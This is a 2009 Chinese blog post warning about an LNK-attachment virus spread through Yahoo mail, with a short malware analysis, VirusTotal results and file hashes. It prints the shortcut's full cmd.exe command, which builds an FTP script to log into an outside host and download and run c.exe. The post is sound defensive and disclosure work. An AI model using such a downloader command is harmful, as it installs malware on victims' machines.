大砲開講

Yahoo信箱LNK病毒─「love….超噴飯的」

2009 年 02 月 05 日 – 11:17:38

昨天收到一封Yahoo寄來的郵件，標題為「love….超噴飯的」，郵件內文夾帶一個附件檔，副檔名為「LNK」，連同前幾天收到這類型的郵件，已經有很多封，此類型病毒應該已經流傳一陣子了，請各位小心。注意：記得將防毒軟體即時掃描設定為所有檔案皆掃瞄。

這封Yahoo郵件畫面，如下所示：

此LNK惡意檔案會執行下列命令：

%windir%\system32\cmd.exe /c echo ftp -s:c.c > c.bat&echo c.exe >> c.bat&echo del c.c >> c.bat&echo open www.as08.com > c.c&echo as08>>c.c&echo 888>>c.c&echo get c.exe >> c.c&echo bye >> c.c&c.bat&

此惡意程式執行之後，有下面的行為：

[DLL injection]
C:\WINDOWS\Help\F3C74E3FA248.dll

[Added file]
C:\WINDOWS\Help\F3C74E3FA248.dll
C:\WINDOWS\Help\F3C74E3FA248.exe
C:\WINDOWS\system32\c.bat

[Added COM/BHO]
{1DBD6574-D6D0-4782-94C3-69619E719765}-C:\WINDOWS\HELP\F3C74E3FA248.dll

此惡意程式執行後，有兩個惡意檔案的數位簽章竟然顯示是微軟檔案：

警政署提供的NPASCAN無法在VMWare環境中執行，畫面如下所示（本來想試試看效果勒，希望此工具能支援囉）：

下列是 VirusTotal 掃描結果 (僅提供參考)(很慘吧)：

檔案 超噴飯的.lnk-1 接收於 2009.02.04 12:03:05 (CET)

反病毒引擎     版本     最後更新     掃瞄結果
a-squared     4.0.0.93     2009.02.04     -
AhnLab-V3     5.0.0.2     2009.02.04     -
AntiVir     7.9.0.71     2009.02.04     -
Authentium     5.1.0.4     2009.02.03     -
Avast     4.8.1281.0     2009.02.03     -
AVG     8.0.0.229     2009.02.03     -
BitDefender     7.2     2009.02.04     -
CAT-QuickHeal     10.00     2009.02.04     -
ClamAV     0.94.1     2009.02.04     -
Comodo     961     2009.02.03     -
DrWeb     4.44.0.09170     2009.02.04     -
eSafe     7.0.17.0     2009.02.01     -
eTrust-Vet     31.6.6341     2009.02.04     -
F-Prot     4.4.4.56     2009.02.03     -
F-Secure     8.0.14470.0     2009.02.04     -
Fortinet     3.117.0.0     2009.02.04     -
GData     19     2009.02.04     -
Ikarus     T3.1.1.45.0     2009.02.04     -
K7AntiVirus     7.10.617     2009.02.03     -
Kaspersky     7.0.0.125     2009.02.04     -
McAfee     5515     2009.02.03     -
McAfee+Artemis     5515     2009.02.03     -
Microsoft     1.4306     2009.02.04     -
NOD32     3825     2009.02.04     -
Norman     6.00.02     2009.02.03     -
nProtect     2009.1.8.0     2009.02.04     -
Panda     9.5.1.2     2009.02.03     -
PCTools     4.4.2.0     2009.02.03     -
Prevx1     V2     2009.02.04     -
Rising     21.15.20.00     2009.02.04     -
SecureWeb-Gateway     6.7.6     2009.02.04     -
Sophos     4.38.0     2009.02.04     Mal/DownLnk-A
Sunbelt     3.2.1835.2     2009.01.16     -
Symantec     10     2009.02.04     -
TheHacker     6.3.1.5.246     2009.02.04     -
TrendMicro     8.700.0.1004     2009.02.04     -
VBA32     3.12.8.12     2009.02.04     -
ViRobot     2009.2.4.1589     2009.02.04     -
VirusBuster     4.5.11.0     2009.02.03     -

附加訊息
File size: 2083 bytes
MD5…: 52eb43f19995f08732051ca7a9aec424
SHA1..: f5e20a2460dced6834c182b133b1aefe178dc51c
SHA256: b83f2cf1cd7d7d0ad6af95a4374aadb6fa94f455eb98eba2c39ef49533cc4637
SHA512: 18ad6cbd80dfcc7116b4a90e20d7d949da20a8d4bd3459cf46e791c62557468a
ec827764343917d2e554869b4baf3cc237f149030ebd929062bd2e4f927d5a52
ssdeep: 24:8S2Pj0j8A5aYef2XwGBvhHIwb+4o0KJi8OhKR1Xt0fqmtW1XuxKlEi9J:8Si0
f5cGAwFoIhpg+xy
PEiD..: -
TrID..: File type identification
Windows Shortcut (100.0%)
PEInfo: -

小紅傘線上分析的結果（下一次病毒碼更新，會包含此惡意程式特徵碼）：